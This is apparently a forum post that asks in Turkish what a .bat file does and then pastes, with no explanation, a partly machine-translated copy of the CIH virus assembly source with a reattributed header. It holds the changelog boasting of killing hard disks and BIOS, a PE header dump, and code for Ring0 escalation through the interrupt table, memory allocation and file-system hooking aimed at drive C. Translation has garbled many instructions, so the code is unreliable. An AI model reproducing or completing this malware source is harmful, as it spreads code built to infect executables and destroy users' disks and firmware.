.bat kodu ne işe yarar?

********** *****

*

; * The Virus Program Information *

;

********** *****

*

; *

*

; * Designer : CIH Original Place : TTIT bydogan of Turkey *

; * Create Date : 04/26/1998 Now Version : 1.2 *

; * Modification Time : 06/21/2007

*

; * *

;

*================================================= =========================

*

; * Modification History *

;

*================================================= =========================

*

; * v1.0 1. Create the Virus Program. *

; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *

; * 04/26/1998 3. Virus Code doesn&l039;t Reload into System.

*

; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *

; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *

; * 6. When System Opens Existing PE File, the File will be *

; * Infected, and the File doesn&l039;t be Reinfected.

*

; * 7. It is also Infected, even the File is Read-Only. *

; * 8. When the File is Infected, the Modification Date and Time *

; * of the File also don&l039;t be Changed. *

; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *

; * Previous FileSystemApiHook, it will Call the Function *

; * that the IFS Manager Would Normally Call to Implement *

; * this Particular I/O Request. *

; * 10. The Virus Size is only 656 Bytes. *

;

*================================================= =========================

*

; * v1.1 1. Especially, the File that be Infected will not Increase *

; * it&l039;s Size... ^__^ *

; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *

; * When Exception Error Occurs, Our OS System should be in *

; * Windows NT. So My Cute Virus will not Continue to Run, *

; * it will Jmup to Original Application to Run. *

; * 3. Use Better Algorithm, Reduce Virus Code Size. *

; * 4. The Virus "Basic" Size is only 796 Bytes. *

;

*================================================= =========================

*

; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *

; * 2. Modify the Bug of v1.1 *

; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *

;

********** *****

*



.586P

;

********** *****

*

; * Original PE Executable File(Don&l039;t Modify this Section)

*

;

********** *****

*



OriginalAppEXE SEGMENT



FileHeader:

db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h

db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h

db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh

db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h

db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h

db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh

db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh

db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h

db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah

db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h

db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h

db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h

db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

OriginalAppEXE ENDS
　　
Virus program starts
TRUE = 1
FALSE = 0
DEBUG = FALSE
　　
The version number is 1.4.
MajorVirusVersion = 1; main version
MinorVirusVersion = 4; minor version number
VirusVersion = MajorVirusVersion * 10 h + MinorVirusVersion; merged version
　　
If debug; DEBUG or not
FirstKillHardDiskNumber = 81 h; destroys disk D
HookExceptionNumber = 05 h; used to interrupt
ELSE
FirstKillHardDiskNumber = 80 h; destroys drive C
HookxceptionNumber = 03 h; use 3 to interrupt
ENDIF
　　
FileNameBufferSize = 7fh
　　
The virus code segment starts.
VirusGame SEGMENT
　　
Assume cs: VirusGame, DS: VirusGame, SS: VirusGame
Assume es: VirusGame, FS: VirusGame, GS: VirusGame
　　
MyVirusStart:
Push ebp
　　
; Modify system exception handling to avoid error messages
Lea eax, [esp-04h * 2]
Xor ebx, ebx
Xchg eax, fs: [ebx]
　　
Call @ 0
　　
@ 0:
Pop ebx; get the start offset of the program. use this offset + relative offset to obtain the absolute address.
Lea ecx, StopToRunVirusCode-@ 0 [ebx]
Push ecx
Push eax
　　
; Modify the interrupt description table to obtain the maximum Ring0 permissions
Push eax
Sidt [esp-02h]; get the base address of the interrupt description table to ebx
Pop ebx;
　　
Add ebx, HookExceptionNumber * 08 h + 04 h; calculate the base address to be interrupted to ebx
　　
Cli; disconnect before modification
　　
Mov ebp, [ebx]; get the base address for exception handling
Mov bp, [ebx-04h]; get entry
　　
Lea esi, MyExceptionHook-@ 1 [ecx]
　　
Push esi; esi indicates the address of the virus interruption routine.
　　
Mov [ebx-04h], si;
Shr esi, 16; modification exception
Mov [ebx + 02 h], si; modify the interrupt base address to point to the virus interrupt routine
　　
Pop esi
　　
; Generate an exception at ring0 level
Int HookExceptionNumber; enters Ring0 through interruption
ReturnAddressOfEndException = $
　　
; Merge all virus codes
Push esi
Mov esi, eax; esi points to the beginning of the virus
　　
; Replicate cyclically
LoopOfMergeAllVirusCodeSection:
Mov ecx, [eax-04h]
　　
Rep movsb; copy the virus code to the first address of the allocated system memory
Sub eax, 08 h
Mov esi, [eax]
Or esi, esi
Jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
　　
Jmp LoopOfMergeAllVirusCodeSection; copy the next section
　　
QuitLoopOfMergeAllVirusCodeSection:
Pop esi
Int HookExceptionNumber
　　
; Save exception handling
ReadyRestoreSE:
Sti; interrupt
Xor ebx, ebx
Jmp RestoreSE
　　
When an exception occurs, it means that the virus stops running in Windows NT and jumps directly to the original program.
StopToRunVirusCode:
@ 1 = StopToRunVirusCode
　　
Xor ebx, ebx
Mov eax, fs: [ebx]
Mov esp, [eax]
　　
RestoreSE:
Pop dword ptr fs: [ebx]
Pop eax
　　
; Jump to the original program and run normally
Pop ebp
　　
Push 00401000 h; Push Original
OriginalAddressOfEntryPoint = $-4; add the starting address of the original program to the stack
Ret; return to the beginning of the original program as a subroutine
Virus initialization module
MyExceptionHook:
@ 2 = MyExceptionHook
　　
Jz InstallMyFileSystemApiHook; if the virus code has been copied
To install the system Hook program.
　　
Mov ecx and dr0; check whether dr0 has been set (dr0 indicates the virus resident flag)
Jecxz AllocateSystemMemoryPage; system memory is allocated if no settings are set.
　　
Add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
　　
; Returns to the original program
ExitRing0Init:
Mov [ebx-04h], bp;
Shr ebp, 16; Restore Exception
Mov [ebx + 02 h], bp; restore the original interrupt base address
　　
Iretd; return of interruption
　　
; Allocate the system memory to be used
AllocateSystemMemoryPage:
Mov dr0, ebx; indicates the virus resident. dr0
Push into memory FH;
Push ecx;
Push 0 ffffffffh;
Push ecx; call method ulong extern _ PageAllocate (ULONG nPages,
; ULONG pType, ulong vm, ULONG AlignMask, ULONG minPhys,
; ULONG maxPhys, ULONG * PhysAddr, ULONG flags );
Push ecx;
Push ecx;
Push 000000001 h;
Push 000000002 h;
Int 20 h; VXD call
_ PageAllocate = $
Dd 00010053 h; use the eax, ecx, edx, and flags registers
Add esp, 08 h * 04 h; resume the stack pointer
　　
Xchg edi, eax; edi points to the first address of allocated system memory
Lea eax, MyVirusStart-@ 2 [esi]; eax points to the beginning of the virus
　　
Iretd; exit interrupted
　　
; Initialize the file system Hook
InstallMyFileSystemApiHook:
Lea eax, FileSystemApiHook-@ 6 [edi]; points to the first address of the file system Hook program
　　
Push eax;
Int 20 h; Vxd call IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
Dd 00400067 h; use the eax, ecx, edx, and flags registers
　　
Mov dr0, eax; save the first address of the original file system Hook program to dr0
Pop eax; eax is equal to the first address of the file system Hook program
　　
; Save the original entry for calling the IFSMgr_InstallFileSystemApiHook function
Mov ecx, IFSMgr_InstallFileSystemApiHook-@ 2 [esi]
Mov edx, [ecx]; edx is the entry of IFSMgr_InstallFileSystemApiHook
Mov OldInstallFileSystemApiHook-@ 3 [eax], edx
　　
; Modify the IFSMgr_InstallFileSystemApiHook entry
Lea eax, InstallFileSystemApiHook-@ 3 [eax]
Mov [ecx], eax; set the address for calling the new IFSMgr_InstallFileSystemApiHook function
; Point to InstallFileSystemApiHook
Cli; disconnection